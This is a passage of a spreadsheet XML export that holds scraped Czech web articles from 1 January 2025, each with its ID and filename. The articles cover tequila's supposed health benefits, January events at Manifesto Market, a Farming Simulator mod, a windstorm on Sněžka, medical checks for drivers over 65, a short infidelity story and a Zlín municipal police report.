právě zde vstupuje na scénu nápoj vyráběný z modré agáve – tequila. Jeho čistota a přírodní složení jej odlišují od ostatních druhů alkoholu . Výzkumy potvrzují, že 100% agávová tequila, v případě, že je konzumována s mírou, přináší nečekané benefity. Přínosy tequily Tequila obsahuje látky zvané agaviny, což jsou specifické cukry přítomné v modré agáve, hlavní surovině tohoto mexického destilátu. Agaviny se chovají jako prebiotika, podporují růst prospěšných bakterií ve střevech a přispívají k lepšímu trávení. Navíc nezvyšují hladinu krevního cukru, což znamená, že nemají negativní vliv na inzulínovou rezistenci, jak tomu bývá u jiných alkoholických nápojů. Podle gastroenterologa Dr. Saurabha Sethiho, který se tématem zabývá, je tequila také méně kalorická ve srovnání s jinými destiláty. Zatímco klasický panák vodky obsahuje přibližně 96 kalorií, tequila se pyšní pouhými 64 kaloriemi. „Metabolismus tequily probíhá pomaleji, což může vysvětlovat, proč po ní někteří lidé zažívají méně intenzivní kocovinu,“ uvádí Sethi. Přesto upozorňuje, že pozitivní vlastnosti platí pouze u čisté tequily bez přidaného cukru. Tequila se vyrábí z Agáve modré Foto Shutterstock Benefity tequily podle vědy Vědecké studie potvrzují, že tequila může mít několik překvapivých účinků: Podpora trávení: Agaviny fungují jako prebiotika a zlepšují střevní mikroflóru. Snížení hladiny cukru v krvi: Agaviny nemají vliv na glykemický index, což z tequily dělá lepší volbu pro osoby sledující hladinu cukru. Silnější kosti: Látky v agáve podporují vstřebávání vápníku a hořčíku, což může přispět ke zdraví kostí. Mírnější kocovina: Čistá tequila se rychleji metabolizuje a méně zatěžuje organismus. Nízký obsah kalorií: Ve srovnání s pivem či vínem má tequila výrazně nižší kalorickou hodnotu. Varování: Co tequila nedokáže Je důležité zmínit, že přestože tequila může být považována za „zdravější“ alkohol , neznamená to, že je zdravá. Alkohol jako takový je toxický pro lidské tělo a při nadměrné konzumaci způsobuje vážné zdravotní problémy, včetně poškození jater, zánětů a rizika závislosti. Když už alkohol pijete, můžete tequilu využít jako lepší volbu. Odborníci doporučují vybírat pouze 100% agávovou tequilu, která je bez přísad a umělých sladidel. Míchání s limonádami či džusy plnými cukru by však její přínosy zcela zničilo. Nejlepší volbou je tequila podávaná samotná nebo s trochou limetkové šťávy. Tequila tak může být elegantním řešením pro ty, kteří si chtějí dopřát alkoholický nápoj s menšími výčitkami. Pamatujte ale, že i tento mexický poklad by měl být konzumován s rozvahou. Jak říká Dr. Sethi: „Zdravější volbou je vždy voda, ale pokud si chcete dopřát, tequila může být tou správnou cestou.“ Autor: Jan Dvořáček Autor person Jan Dvořáček</t>
  </si>
  <si>
    <t>19050</t>
  </si>
  <si>
    <t>20250101_1_3698732573_0c370d5a1e198c6f2f33.html</t>
  </si>
  <si>
    <t>0c370d5a1e198c6f2f33</t>
  </si>
  <si>
    <t>Lednové akce v Manifesto Marketu: Après-ski, filmy, hudba a brunch</t>
  </si>
  <si>
    <t>Lednové akce v Manifesto Marketu: Après-ski, filmy, hudba a brunch V lednu v M an if e sto W int e r M a r ke t u bude nejenom kino a živá hudba, ale taky se Après-Ski party, kterou si nechcete nechat ujít. V rámci lednového programu plánujeme i soutěže, kde můžete vyhrát poukaz na večeři do Manifesta. Kino Eats v Manifesto Marketu K ino Ea ts v Manifesto Marketu vám již 2. ledna v 18 hodin přináší ﬁlm Pařba ve Vegas . Jesli jste sami po pařbě, nebo se jen chcete zasmát, Kino Eats je pro to jako dělaný. Večer plný jídla, skvěle míchaných koktejlů a pohodové ﬁlmové atmosféry. Kidz Kino v Manifesto Marketu Nezapomněli jsme ani na naše nejmladší hosty, pro které jsme připravili speciální edici K id z K ino s tím nejlepším výběrem ze Zlatého glóbusu. V neděli 5. ledna v 16 hodin promítáme jeden z nominovaných ﬁlmů na Zlatý glóbus za nejlepší celovečerní animovaný ﬁlm, V Hlavě 2. Součásti promítání je i quiz, kde vás necháme hádat letošního výherce glóbusu. Tomu, kdo správně uhodne výherce kategorie, se odměníme drinkem na nás a nebo poukazem na večeři v Manifestu. Živá hudba a DJ sety v Manifestu Přijďte si užít večer za doprovodu živé hudby! Ať už přijdete s přáteli, na rande, nebo jen tak posedět, postaráme se o správnou atmosféru a zimní pohodu s dobrým jídlem a skvělou hudbou. Hudební program: Pátek 3. ledna, 18:00–20:00 – DJ Benux Čtvr tek 9. ledna, 18:00–20:00 – Marco Dose (živá hudba) Pátek 17. ledna, 18:00–20:00 – DJ Beats a Oalan Sax (DJ mix a živá hudba) Čtvr tek 30. ledna, 18:00–20:00 – Backbeat music duo (živá hudba) Mezinárodní den tempury po celý týden v Manifesto Marketu Od úterý 7. ledna do neděle 12. ledna vás zveme na t ý d e n pln ý t e mpur y! Dvě z našich skvělých restaurací, Gohan a Taiko, připravily jedinečné menu inspirované japonským street foodem. At’ už takoyaki (kuličky z chobotnice), karaage (šťavnaté kuřecí kousky) nebo kakiage (zelenina v tempuře), přeneseme vás do atmosféry tradiční japonské izakayi. Pokrmy se skvělé párujou s japonským pivem nebo saké. Après-Ski v srdci města Jestli vám chybí Après-ski nálada, ale na hory se vám nechce, tak Manifesto je tím místem pro vás. V p átek 24. ledna a v sobotu 25. ledna si můžete užít DJ’s, výzdobu a koktejly jako z hor. Co tak třeba bombardino? Přijďte v nejlepším lyžařském nebo après-ski outﬁtu a zapojte se do zábavy! Ať už to bude retro kombinéza, stylový horský obleček nebo něco šíleného, nejlepší outﬁt večera získá cenu a zveřejnění na našem Instagramu. Víkendový brunch a bezedné koktejly v Manifesto Marketu Každý víkend až do konce ledna si v Manifestu můžete dát víken do vý brunch. Máme pro vás připravenou skvělou nabídku ze SOOT baru s bezednou Mimosou, Pear Hug koktejlem či domácím svařákem. Tags: akce leden Manifesto Market You may also like... Autor: redakce Rubrika transition_slide Kultura</t>
  </si>
  <si>
    <t>8540</t>
  </si>
  <si>
    <t>20250101_10_3698302844_b37592af2232d868313d.html</t>
  </si>
  <si>
    <t>b37592af2232d868313d</t>
  </si>
  <si>
    <t>Rhum Factory V1.0.0.0</t>
  </si>
  <si>
    <t>Rhum Factory V1.0.0.0 Továrna na rum *Zneužívání alkoholu je nebezpečné pro vaše zdraví, konzumujte s mírou* K otočení potřebujete cukrovou třtinu. recept je jednoduchý. Cena: 140 000 € zdroj: Cukrová třtina: 900 000 litrů Palety: bílý rum 150000 litrů Základní prodejní cena 2,69€ Prodej probíhá na prodejně Kredity: DOWNLOAD Jak používat Farming Simulator 25 mody Vítejte v největší moddingové komunitě Farming Simulatoru. Stále si nejste jisti, k čemu slouží Farming Simulator 25 mods? Hra byla vyvinuta tak, aby podporovala modifikace (mody), které může vytvořit každý fanoušek. Mody tedy můžete použít k upgradu původní hry. Ano, souhlasíme s tím, že hra je již velmi dobrá, nicméně můžete mít pocit, že ve hře potřebujete více kombajnů, traktorů nebo jiných nástrojů. Navíc samotná hra nabízí různé typy modů, které mohou změnit hru, opravit některé chyby, které hráče obtěžují, nebo se jen pokusit udělat hru zajímavější. To je důvod, proč byste měli vyzkoušet FS25 mods. Vzhledem k tomu, že existuje mnoho různých FS 25 modů, instalace jednoho z nich hru trochu změní a stane se jedinečnou. Všechny LS25 mody jsou zcela zdarma, takže se nemusíte bát plateb nebo skrytých daní. Vyzkoušejte nyní Farming Simulator 25 mods a staňte se lepším farmářem. Nejlepší FS25 Budovy mods Autor: FS22mods Rubrika transition_slide FS25 Budovy</t>
  </si>
  <si>
    <t>2860</t>
  </si>
  <si>
    <t>20250101_100_3696678439_de2e9357fdf298942b19.html</t>
  </si>
  <si>
    <t>de2e9357fdf298942b19</t>
  </si>
  <si>
    <t>Vítr o síle orkánu zasáhl Sněžku a rozehnal inverzi. Výrazně se ochladí, říká předpověď</t>
  </si>
  <si>
    <t>Vítr o síle orkánu zasáhl Sněžku a rozehnal inverzi. Výrazně se ochladí, říká předpověď PŘEDPOVĚĎ POČASÍ Silný vítr s nárazy o rychlosti až 90 kilometrů v hodině by měl být v Krkonoších i ve čtvrtek. Foto: Shutterstock 1. ledna 2025 Sdílet: Sedm dní trvající slunečné inverzní počasí v Krkonoších dnes skončilo. Hřebeny hor byly většinu dne v silné mlze. Hory zasáhl i silný vítr. Na Sněžce měl v nárazech sílu orkánu. Horní úsek lanovky na Sněžku byl kvůli tomu od rána mimo provoz. Provoz ostatních lanovek v Krkonoších vítr neomezil, uvedli provozovatelé areálů. Podle dat měřicí stanice na poštovně Anežka na vrcholu Sněžky měl vítr dnes odpoledne rychlost v nárazech téměř 150 kilometrů v hodině. Hranice orkánu činí 117,7 km/h. Teplota se po 14:00 na vrcholu hory pohybovala okolo minus čtyř stupňů Celsia, ale pocitová teplota byla kvůli větru kolem minus 17 stupňů. Lanovka na Sněžku může být v provozu do rychlosti větru 60 kilometrů za hodinu. Jan Křovák , 1. ledna 2025 REAKCE NA PROJEV PREZIDENTA Silný vítr s nárazy o rychlosti až 90 kilometrů v hodině by měl být v Krkonoších i ve čtvrtek. "Přes naše území bude postupovat studená fronta od severozápadu a ukončí inverzní ráz počasí. Na horách čekáme výrazné ochlazení pod nulu a pocitovou teplotu bude navíc snižovat i silný vítr," uvedli meteorologové. Rekreanty vracející se domů ze silvestrovských pobytů policie upozornila na dnešní zvýšený provoz na silnicích. V kontrolách zaměřených na řízení pod vlivem alkoholu bude policie pokračovat. "Silvestrovská opatření pro policisty nekončí ani s příchodem nového roku. Hlídky se kromě dohledu nad veřejným pořádkem zaměřují i na bezpečnost na silnicích," uvedla mluvčí hradecké policie Karolína Macháčková. max , 1. ledna 2025 ROK ROZHODNUTÍ Na hřebenech Krkonoš leží od 40 do 80 centimetrů sněhu. V lavinových katastrech platí první, nejnižší stupeň lavinového nebezpečí z pětidílné mezinárodní stupnice. Všechna lyžařská střediska Krkonoš jsou v provozu. V některých níže položených areálech zůstává kvůli nedostatku sněhu část sjezdovek zatím zavřená. Sdílet: počasí Krkonoše Související články Autor: Echo24 || Sdílet: Rubrika transition_slide Panorama</t>
  </si>
  <si>
    <t>165930</t>
  </si>
  <si>
    <t>20250101_101_3723719266_5bf0854c122945d0791e.html</t>
  </si>
  <si>
    <t>5bf0854c122945d0791e</t>
  </si>
  <si>
    <t>Novoroční ohlédnutí za uplynulým rokem České barmanské asociace</t>
  </si>
  <si>
    <t>Novoroční ohlédnutí za uplynulým rokem České barmanské asociace 01. 01. 2025 Vážení přátelé, partneři a příznivci České barmanské asociace, úvod Novoročního pozdravu si dovolím, jako již tradičně, věnovat komentáři aktuální situace, přičemž jeho celkové vyznění se v posledních letech obsahově příliš nemění, a nejinak tomu bude i tentokrát. Bohužel, nebo bohudík? No, spíš bohužel. Obor pohostinství od covidové pandemie až na výjimečné epizody neopouští těžkosti a obecně negativní nálada. Stesky gastronomů jsou podloženy nezpochybnitelnými daty. Ve všech měsících uplynulého roku zaznamenaly jejich tržby meziroční pokles. Korunu všemu nasadilo povodňové září s poklesem o desítky procent. Uvedený trend se týká všech typů gastronomických podniků s výjimkou kaváren, nejhorší dopad ale současný vývoj má na noční barový a klubový život. Čím dál více lidí si zkrátka odepře večerní posezení a zábavu ve společnosti, což nejvíce platí o mladší generaci. Bojem o přízeň hostů ale těžkosti podnikatelů v gastronomii nekončí. Více než dvě třetiny z nich vidí jako zásadní překážku pro rozvoj svého byznysu v nastávajícím roce vysoké náklady na pracovní sílu, její nedostatek pak více než 60 procent. Větší polovina podnikatelů je nespokojená se značnou administrativní a regulatorní zátěží. Východisko této reality je nejisté. Někdo ji v roce 2025 ustojí, někdo byznys zredukuje či pozmění jeho koncept směrem k lepší ekonomické a provozní udržitelnosti, někdo úplně skončí. Mě osobně však neopouští víra v to, že kdo dělá svou práci poctivě, srdcem a ve složitějších časech k tomu přidá nezbytnou porci kreativity, ten se úspěchu nakonec dočká. Proto tým České barmanské asociace odpovědně pracuje dál. Stále se soustředí na součinnost při výchově mladých gastronomických talentů, pořádá pro ty nadanější z nich soutěže a pro jejich pedagožky a pedagogy uznávané a do posledního místa naplněné vzdělávací akce, vyvoláváme diskuzi o rozkolu mezi úrovní absolventů a požadavky jejich budoucích zaměstnavatelů. V roce 2024 se nám podařilo uspořádat další ročník Czech Bartenders League a Czech Flair League nebo reprezentovat na soutěžním pódiu i v zákulisí World Cocktail Championship. Blyštivým úspěchem uplynulého roku je vítězství Martina Vogeltanze na Mistrovství světa v přípravě nealkoholických koktejlů – Mattoni Grand Drink. Velice nás těší přízeň našich skvělých partnerů, s nimiž se nám daří nejenže nalézat různé formy spolupráce, ale také ji rozvíjet a prohlubovat – toho si nesmírně vážíme. Milí přátelé, děkuji, že jste s Českou barmanskou asociací na jedné lodi při její misi dlouhodobě kultivovat tuzemskou gastronomii. Přeji vám inspirativní a úspěšný rok 2025. Prezident České barmanské asociace Aleš Svojanovský. www.cbanet.cz www.iba-world.com Svátek burčáku a vína u Máchova jezera se blíží Závěr letní sezóny u Máchova jezera již tradičně patří Vinobraní v areálu hotelu Port. Návštěvníky letos čeká již sedmý... 23. 07. 2018</t>
  </si>
  <si>
    <t>20250101_102_3696675942_389945a306e050049799.html</t>
  </si>
  <si>
    <t>389945a306e050049799</t>
  </si>
  <si>
    <t>Křemelinový filtr FSK1 – levná filtrace vína</t>
  </si>
  <si>
    <t>Křemelinový filtr FSK1 – levná filtrace vína Prodám starší funkční křemelinový filtr. Cena 99.000 Kč 776173365 Autor: Barina</t>
  </si>
  <si>
    <t>667</t>
  </si>
  <si>
    <t>20250101_103_3696667010_9ba3e47572bf58120809.html</t>
  </si>
  <si>
    <t>9ba3e47572bf58120809</t>
  </si>
  <si>
    <t>Upozornění: Statisíce seniorů nad 65 let nesmí v lednu usednou za volant</t>
  </si>
  <si>
    <t>Upozornění: Statisíce seniorů nad 65 let nesmí v lednu usednou za volant řidiči, řidičský průkaz V roce 2025 čeká řidiče několik povinností, na které nesmí zapomenout. Jedna z nich se týká lidí, kteří dosáhli věku 65 let. Ti u sebe ve vozidle musí neustále mít potvrzení o zdravotní způsobilosti, bez které nesmí řídit. V roce 2024 se zpřísnil bodový systém a pokuty, které se zaměřují na trestání bezohledných řidičů a naopak šetří ty poctivé, kteří nemají žádné záznamy a pokuty dostávají jen výjimečně. Tím to ale neskončilo. Povinnosti se týkají i starších řidičů, zejména těch, kteří již dovršili 65 let. Řidiči musí od 65 let pravidelně podstupovat lékařské prohlídky jinak riskují pokuty i odebrání řidičského průkazu | Foto Shutterstock Řidiči nad 65 let musí mít potvrzení od lékaře Aktivní řidiči, kteří dosáhli věku 65 let, se musí v roce 2025 podrobit lékařské prohlídce, která ověří jejich způsobilost k řízení vozidel. Kromě odchodu do důchodu musí lidé řešit také povinnou zdravotní prohlídku, na které se zjistí, jestli je řidič stále způsobilý k řízení motorového vozidla. Pokud ne, řidičský průkaz mu bude odebrán. Mohl by totiž ohrozit nejen sebe, ale také ostatní řidiče, chodce a své spolujezdce. Pokud se vás povinná zdravotní prohlídka týká, jděte na ni ideálně už dříve (můžete až 6 měsíců před 65. narozeninami), prohlídku musíte splnit nejpozději den před dovršením 65 let. Pokud byste tuto povinnost nestihli včas, nesmíte řídit, dokud prohlídku nepodstoupíte. Pokud si myslíte, že budete mít po absolvování prohlídky klid, příliš se neradujte. Další vás čeká v 68 letech. Od 70 let už je pak nutné na prohlídku docházet každé dva roky. Zmíněné potvrzení musí mít řidiči při řízení vždy u sebe. Lékař vám zkontroluje nejen zrak a sluch, ale také celkový fyzický a zejména duševní stav. Pokud by něco nebylo v pořádku, může vás lékař poslat na dopravně-psychologické vyšetření. Pokud je vaše zdraví špatné, lékař může vaši způsobilost k řízení automobilu zcela vyloučit. V případě, že byste řídili i bez patřičných dokumentů dokazujících způsobilost k řízení, riskovali byste pokutu ve výši 1 500 Kč na místě, nebo až na 5 000 Kč ve správním řízení. Rychlá jízda se nevyplatí Můžete snadno přijít o řidičský průkaz a zaplatit tučnou pokutu | Foto Shutterstock Přísnější bodový systém a pokuty Jak jsme zmínili výše, na řidiče se bude i v roce 2025 vztahovat přísnější bodový systém, který se nese zejména ve zvýšeném počtu trestných bodů za porušení předpisů, ale také vyšších pokut, které mohou některým řidičům pořádně provětrat peněženku. Mezi nejčastějšími prohřešky jsou samozřejmě pokuty za rychlost, které se pohybují v závislosti na překročené rychlosti od 1 500 Kč do 3 500 Kč na místě, nebo ve správním řízením až do výše 25 000 Kč spolu se zákazem řízení na 6 až 18 měsíců. Pokud by vás zajímal trest za překročení rychlosti o méně než 10 km/h v obci nebo mimo ní, tak by se jednalo o pokutu ve výši až 1 500 Kč, případně až 2 500 Kč ve správním řízení. Pokud byste nezastavili chodci na přechodu, riskujete pokutu ve výši až 3 500 Kč, nebo ve správním řízení až 10 000 Kč. Spolu s pokutou by vám přibyly také dva trestné body. Za jízdu pod vlivem alkoholu nebo drog byste dostali pokutu ve správním řízení ve výši 7 000 Kč až 25 000 Kč, nad 0,3 promile byste dostali také 6 trestných bodů. Řízením pod vlivem alkoholu či drog řidič riskuje také odebrání řidičského průkazu na 6 až 18 měsíců. Autor: Aneta Susedíková Autor person Aneta Susedíková</t>
  </si>
  <si>
    <t>17490</t>
  </si>
  <si>
    <t>20250101_104_3696665743_b0412c1b15540e6b3a2c.html</t>
  </si>
  <si>
    <t>b0412c1b15540e6b3a2c</t>
  </si>
  <si>
    <t>Osudová nevěra: Příběh Martiny a&amp;nbsp;její cesta k&amp;nbsp;pádu</t>
  </si>
  <si>
    <t>Osudová nevěra: Příběh Martiny a&amp;nbsp;její cesta k&amp;nbsp;pádu Osudová nevěra: Příběh Martiny a její cesta k pádu Martina, zdánlivě šťastná manželka a matka, podlehla kouzlu svého šéfa. Co začalo jako nevinná pozornost, skončilo tajnými schůzkami a devastujícím odhalením. Příběh o pokušení, ztrátě důvěry a důsledcích, které změnily život celé rodiny. Příběh Martiny: Nevěra, která změnila vše Martina byla zdánlivě spokojenou manželkou a matkou dvou dětí. S manželem Lukášem tvořili harmonický pár, který okolí považovalo za vzor. Lukáš byl pracovitý, klidný a oddaný rodině, zatímco Martina pracovala jako marketingová manažerka ve středně velké firmě. Její život se zdál být dokonalý – až na jednu výjimku: pocit, že jí něco chybí. První kroky k nevěře Martina si postupem času začala všímat, že jí její šéf Tomáš věnuje více pozornosti než ostatním kolegyním. Byl charismatický, pohotový a dokázal ocenit její práci. Martina se cítila uznávaná a atraktivní, což u manžela už delší dobu neprožívala. Jejich vztah doma se stal rutinou, plný povinností a nedostatku vzájemné pozornosti. Zlom nastal během firemního teambuildingu, který se odehrával na horské chatě v Beskydech . Po oficiálním programu se Martina a Tomáš rozhodli pokračovat v konverzaci u sklenky vína . To, co začalo jako nevinný rozhovor o pracovních záležitostech, skončilo polibkem, který odstartoval jejich tajný románek. Místa tajných schůzek Jejich vztah se odehrával na různých místech: Kancelář po pracovní době : Po večerech, kdy už v práci nikdo nebyl, se Martina a Tomáš často scházeli v jeho kanceláři. Tam měli jistotu, že je nikdo nepřekvapí. Hotelové pokoje : Při služebních cestách si Tomáš vždy rezervoval dva pokoje vedle sebe, aby jejich schůzky nebudily podezření. Odlehlé kavárny : Martina a Tomáš si oblíbili kavárnu na okraji města, kde je nikdo neznal. Odhalení a následky Martina byla přesvědčená, že její manžel nic netuší. Ale Lukáš začal vnímat, že je jiná. Byla častěji nepřítomná, neustále na telefonu, a při otázkách o její práci reagovala podrážděně. Nakonec ji prozradila obyčejná zpráva – Tomáš jí poslal romantický text, který si Lukáš náhodou přečetl, když se jí vybil telefon a ona požádala o jeho. Po konfrontaci se Martina přiznala, ale tím celá situace nabrala nový rozměr. Lukáš byl zdrcený a chtěl okamžitý rozvod. Martina si uvědomila, co všechno riskovala a ztratila – rodinu, důvěru svých dětí i respekt svého okolí. Varování a doporučení Tento příběh je ukázkou, jak snadné je podlehnout pokušení, ale zároveň, jak devastující mohou být následky. Pokud máte pocit, že váš vztah stagnuje, snažte se o otevřenou komunikaci a pracujte na problémech společně. Zde jsou některá doporučení: Pečujte o svůj vztah : Nezapomínejte na drobnosti, které vás s partnerem sbližují, jako je společně strávený čas, komplimenty nebo malé romantické gesta. Mluvte o svých pocitech : Pokud se cítíte přehlíženi, nečekejte na změnu. Sdílejte své obavy a přání se svým partnerem. Vyhýbejte se rizikovým situacím : Pokud cítíte náklonnost k někomu jinému, snažte se minimalizovat kontakt a nezapojovat se do situací, které by mohly vést k něčemu víc. Vážit si důvěry : Důvěra je základem každého vztahu. Jakmile ji jednou ztratíte, cesta zpět je nesmírně těžká. Příběh Martiny je mementem, že krátkodobé poblouznění nestojí za dlouhodobou ztrátu lásky, rodiny a vlastního sebevědomí. Myslete na následky, než se rozhodnete překročit hranici, která může zničit vše, co jste doposud budovali.</t>
  </si>
  <si>
    <t>448350</t>
  </si>
  <si>
    <t>20250101_105_3696650007_47929393b92b0ecff2b4.html</t>
  </si>
  <si>
    <t>47929393b92b0ecff2b4</t>
  </si>
  <si>
    <t>Zdravotní sestra z&amp;nbsp;Ukrajiny</t>
  </si>
  <si>
    <t>Zdravotní sestra z&amp;nbsp; Ukrajiny Zdravotní sestra z Ukrajiny Jakmile zdravotní sestra z Ukrajiny promluvila, dcera pohlédla na matku, která v jejích očích spatřila strach, obavy a nedůvěru. Obě trochu pokrčily rameny. No - nedá se nic dělat, musí se jít dovnitř. Snad vše proběhne v pořádku. Kdo by nyní čekal dramatické líčení, jak zachraňuje svého partnera či bratra nebo docela cizí muže někde uprostřed válečných bojů, bude patrně zklamán. Jistě se uvedených situací najde poměrně dlouhá řada, neboť válka trvá již skoro 1050 dnů. A leckteré poskytnou dramatický obrázek. Jistě by se tam nikdo nechtěl vyskytnout osobně. Podobně by někomu mohly naskočit poněkud lechtivé obrazy, kdy by se nechal inspirovat shlédnutými erotickými filmy či videi, během nichž nějaká obecná a anonymní zdravotní sestra „ošetřuje“ jisté pacienty. Takřka vše je možné, leč tudy dnešní cestička nepovede. Já bych se rád zastavil u praktičtější podoby, se kterou máme možnost se v našich aktuálních životech setkávat. Důvtipné osobě již dochází, že se někdo dostavil do čekárny u lékaře a po chvíli čekání, jak je zvykem, vyjde ven zdravotní sestra. Přízvuk ji hned prozradí, že nepatří mezi rodilé mluvčí. Hlavou bleskne, že žena ruské příslušnosti u nás nejspíše pracovat nebude. Pak musí jít o zdravotní sestru z Ukrajiny . A něco se začíná rozjíždět. Především v hlavě. Zřejmě nebude chybou upozornit na docela známou záležitost, kdy se docela hodně lidí poddává obecným názorovým stereotypům. Někdy si svoje kroky příliš neuvědomují, neboť konají v jakémsi automatickém modu. Už jen proto by si na své chování měli dát pozor. Neříkám, že naučené a zvnitřněné reakce jsou chybou. Naopak, šetří nám čas a energii, které je možné a mnohdy prospěšné věnovat na jiné úkoly a odlišným směrem. Přesto je užitečné si nad svým chováním ponechat kontrolu. Byť nemusí být úplná. Nabízejí se konkrétní příklady. K lékaři musí aktuálně zamířit jedna slečna - žákyně z druhého stupně. Pravda, není již malým dítětem, ale přece jenom se řadí mezi nezletilé a doprovod rodiče a obecně zákonného zástupce se vyžaduje. I když se náctiletému potomkovi nemusí líbit, že se má v ordinaci svěřovat. Někdy s dost citlivými elementy - v tělesné a třeba i duševní rovině. Jakmile zdravotní sestra z Ukrajiny promluvila, dcera pohlédla na matku, která v jejích očích spatřila strach, obavy a nedůvěru. Obě trochu pokrčily rameny. No - nedá se nic dělat, musí se jít dovnitř. Snad vše proběhne v pořádku. Jako zajímavé se jeví zjištění, že děti jsou považovány za tzv. čisté listy a chovají se přirozeně a bezprostředně, a proto by tu neměly nastat komplikace. Jenže naše slečna má svoje zkušenosti s cizinci. Vidí a slyší, jak se někteří ve městě chovají ne zcela vhodně. Jsou hluční, roztahují se na veřejnosti, odhazují odpadky, často mívají v rukou cigarety a alkohol . Část spíše negativních poznatků má také ze třídy. V jejich řadách je celkem pět dětí z Ukrajiny . Dokud byly tři, tvořily uzavřenou skupinku a pomáhaly si. Po navýšení počtu se oddíl rozpadl a nyní leccos natropí. Tady se jedná o kapitolku na jindy. Jak nám napovídá obecná lidová zkušenost - „konec dobrý, všechno dobré“. Vyšetření proběhlo naprosto bez potíží. Zdravotní sestra z Ukrajiny vystupovala cele profesionálně, měla přehled, orientovala se v dokumentech, věděla, kam pro co má sáhnout, kontrolovala přístup k panu doktorovi atd. Nic se nedalo vytknout. Po „akci“ obě ženy poděkovaly a rozloučily se. Venku se na sebe podívaly. Slov nebylo třeba. Trochu se styděly za svoje váhání, nejistotu a počáteční nedůvěru. Leč jejich chování považujme za normální. Příště budou „lepší“. Snad. Ale nesměřujme dopředu příliš lehce. Leckdy na ně po české sestře čeká zahraniční lékař.</t>
  </si>
  <si>
    <t>20250101_106_3696618647_757820d489e757501c05.html</t>
  </si>
  <si>
    <t>757820d489e757501c05</t>
  </si>
  <si>
    <t>Víno Rulandské modré (barrique) 2007, jakostní víno, Vinařství Oulehla</t>
  </si>
  <si>
    <t>Víno Rulandské modré (barrique) 2007, jakostní víno , Vinařství Oulehla /100 10. 5. 2022 „ Víno rubínové barvy s elegantní jiskrou. Vůně nabízí třešňově-švestkové tóny s jemnou připáleninou. Ve středně dlouhé chuti lze nalézt ovocité tóny s převahou lesních jahod. Třísla jsou velmi jemná, víno je plné (ale za cenu zbytkového cukru 3.4g), kyselinka stále pěkně drží, a v dochuti je příjemná kořenitost kombinovaná s kávovými tóny. Tento pinot vůbec nepůsobí unaveným dojmem, je ve výborné kondici na to, že se jedná o ročník 2007 a mám ho čtyři dny otevřené. Nakonec pinoty by měly být dlouhověké... K lahvi jsem se dostal úplnou náhodou (jak už to tak bývá), jednalo se o zapomenutou paletu ve sklepě u p. Oulehly a já se tam zrovna v tu dobu vyskytl...“ (1) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_107_3696640442_5f944ad2531a67e8ca06.html</t>
  </si>
  <si>
    <t>5f944ad2531a67e8ca06</t>
  </si>
  <si>
    <t>Oslavy a vítání nového roku 2025 proběhly ve Zlíně poklidně</t>
  </si>
  <si>
    <t>Oslavy a vítání nového roku 2025 proběhly ve Zlíně poklidně 01/01/2025 Oslavy svátku, kdy planeta Země úspěšně dokončila další oběh kolem centrální hvězdy naší sluneční soustavy, proběhly ve Zlíně z pohledu městské policie poměrně klidně. Krátce před polednem vyjížděla hlídka Městské policie Zlín z okrsku Jižní Svahy na zastávku MHD, kde došlo při vystupování z trolejbusu k pádu staršího muže. O tři minuty později strážníci zjistili, že se jedná o 70letého seniora, který je střízlivý a při pádu neutrpěl žádné poranění. Vzhledem ke svému věku a zdravotním omezením se však nedokázal vlastními silami postavit. Hlídka MP Zlín mu tak nejen pomohla zpět na nohy, ale s ohledem na snížené pohybové schopnosti seniora jej dopravila do místa bydliště, kde ho předala rodinnému příslušníkovi. Bezpečí v útrobách stanice městských hasičů v místní části Prštné hledal kolem čtvrt na pět odpoledne pes – kříženec, který se zaběhl svému majiteli. Protože se v daný moment nepodařilo zjistit totožnost majitele, převezli ho strážníci do zlínského útulku pro zvířata v nouzi. Ve stejném zařízení pak skončil také druhý pes – jezevčík, který byl odchycen o několik desítek minut později v lokalitě Podhoří. Krátce před osmou hodinou večerní pak vyjížděla hlídka MP Zlín na zastávku MHD Zahradnická, kde cestující v trolejbusu porušil přepravní řád a řidič jej vykázal z přepravy. Strážníci zjistili, že se jednalo o 32letého muže z Otrokovic , který uvnitř vozu MHD kouřil elektronickou cigaretu. Hlídka MP Zlín muži vysvětlila, že takovým jednání nejenže porušuje přepravní řád, ale dopouští se také přestupku podle zákona o ochraně zdraví před škodlivými účinky návykových látek. A protože oznamovatelem byl samotný cestující, který nakonec pochopil podstatu problému, mohla s ním být věc uzavřena ze strany městské policie domluvou. Kolem půl deváté se na služebnu MP Zlín dostavil řidič taxislužby, který nalezl ve svém vozidle mobilní telefon. Ten vypadl z oděvu zákazníka, kterého předtím vezl do místní části Kudlov, ale nezná jeho totožnost, přístroj je zaheslovaný a nelze z něj uskutečnit žádný hovor, který by mohl vést ke zjištění jeho majitele. Strážníci přístroj převzali a čekali. Na Nový rok se pak dočkali, kdy na přístroji přijali hovor od bratra majitele, kterého seznámili s nastalou událostí. Hodinu před novoročním obědem si tak mohl majitel svůj telefonní přístroj opět vyzvednout. Příchod roku 2025 oslavily na náměstí Míru přibližně čtyři desítky osob a za přítomnosti hlídek MP Zlín vše proběhlo v relativním poklidu a bez narušení veřejného pořádku. O hodinu a půl později ale spatřil operátor městského kamerového systému dvojici mladíků ve věku 17 a 18 let, kteří se rozhodli vyřídit účty s přenosnými dopravními značkami, které drze postávaly ve směru jejich chůze. Jeden z nich tak odnesl a posléze opodál odhodil směrovací desku, druhý pak sejmul přenosnou dopravní značku zákaz vjezdu. Protože se vše odehrávalo před zraky dvou půvabných slečen, které siláky doprovázely, nebylo pochyb, že je jejich jednání motivováno předvedením dobré fyzické kondice a dostatku sil k založení vlastního potomstva. A protože pak oba chlapci za přítomnosti hlídky MP Zlín uznali, že takové jednání přeci jen nemá za mák smyslu a dopravní značení vrátili zpět na původní místo, mohli také oni vyváznout s novoroční domluvou. Domluva byla naopak vyloučena u případu 50letého muže, který měl z obtížně pochopitelného důvodu napadnout svoji sousedku. Ta se čtvrthodinu po druhé hodině ranní obrátila na tísňovou linku 156, a na místo tak hned vzápětí zamířila motorizovaná hlídka z okrsku Jižní Svahy. Strážníci zjistili, že se 39letá žena potkala s dotyčným na domovní chodbě. Zde se vzájemně pozdravili, načež zašla do svého bytu. Když ale po chvíli uslyšela divný zvuk, podívala se dveřním kukátkem a spatřila svého souseda s fixou v ruce, jak něco píše na vstupní dveře jejího bytu. Když je pak náhle otevřela, soused se snažil poněkud neohrabaně zmizet, ale při následné konfrontaci ji měl neurvale uchopit a držet za ruce. Hlídka MP Zlín zjistila, že se dotyčný snažil o neumělé nakreslení znaku francouzské automobilky, který se mu úplně nepovedl, a tak se jej pokusil vylepšit několika dalšími 